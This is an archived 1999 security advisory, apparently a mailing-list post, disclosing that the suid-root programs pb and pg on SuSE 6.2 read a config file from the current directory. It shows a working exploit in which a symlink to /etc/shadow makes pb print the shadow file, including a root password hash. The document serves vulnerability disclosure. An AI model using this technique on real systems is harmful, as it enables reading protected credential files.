suse6.2pbpg.txt

`Brock Tellier [[email protected]]  
Sent: Thursday, September 16, 1999 5:06 PM  
Subject: Two SuSE 6.2 local root exploits  
  
Greetings,  
  
/usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow  
any user to read any file on the system as shown:  
  
susebox:/root # ls -la /usr/bin/pb  
uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb  
  
susebox:/root # strace /usr/bin/pb  
...  
personality(PER_LINUX) = 0  
getpid() = 16623  
brk(0) = 0x805032c  
brk(0x80504cc) = 0x80504cc  
brk(0x8051000) = 0x8051000  
open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or  
directory)  
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such  
file or directory  
) = 41  
_exit(1) = ?  
susebox:/root #  
  
---  
xnec@susebox:/tmp > id  
uid=1001(xnec) gid=100(users) groups=100(users)  
xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf  
xnec@susebox:/tmp > pb  
Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> =  
<bin:*:8902:0:10000::::>  
Unknown config line : <daemon:*:8902:0:10000::::> =  
<lp:*:9473:0:10000::::>  
Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>  
Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>  
... etc for the entire shadow file  
  
The same scenario for /usr/bin/pg's pg.conf in your cwd. These two  
programs also contain numerous buffer overflows and other insecure file  
i/o and should obviously lose their suid bits. They cannot operate  
correctly without their s-bits unless they are run by root, but no one  
besides root will run them anyway. These programs are not worth  
patching.  
  
Brock Tellier  
UNIX Systems Administrator  
Webley Systems  
www.webley.com  
`